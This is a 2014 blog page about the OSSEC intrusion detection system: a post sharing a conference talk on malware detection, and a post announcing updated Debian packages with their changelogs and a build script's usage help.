Tuesday, September 23, 2014

OSSEC CON 2014 - Malware Detection with OSSEC

Happy to share my presentation from the OSSEC CON, which took place on September 16th in Cork, Ireland. Here you can find a brief explanation of different malware collection and analysis techniques, as well as a good example of how to use some IOCs to create a rootcheck signature.



And, for those interested, here is the video as well:


Updated OSSEC debian packages

Just published new versions ossec-hids_2.8-2 and ossec-hids-agent_2.8-2, for the different Debian distributions. Those can be found here: http://ossec.alienvault.com/repos/apt/debian/pool/main/o/

Here are the changelogs:
 ossec-hids (2.8-2) stable; urgency=low  
  * Fixed Makefile to use ossec-hids-debian.init instead of ossec-hids.init (fixes LSB headers warning).  
  * Fixed CVE-2014-5284. Patch included.  
  * Included debconf and templates for initial package configuration (email_to, email_from and smtp).  
 ossec-hids-agent (2.8-2) stable; urgency=low  
  * Fixed Makefile to use ossec-hids-debian.init instead of ossec-hids.init (fixes LSB headers warning).  
  * Fixed CVE-2014-5284. Patch included.  
  * Included debconf and templates for initial package configuration (server_ip).  
And the link to the github repo: https://github.com/santiago-bassett/ossec-debian.git

I also took the opportunity to update generate_ossec.sh script, which now accepts a few different arguments:
 santiago@debian-package:~# ./generate_ossec.sh -h  
 USAGE: Command line arguments available:  
 -h | --help Displays this help.  
 -u | --update Updates chroot environments.  
 -b | --build Builds debian packages.  
 -s | --sync Synchronizes with the debian repository.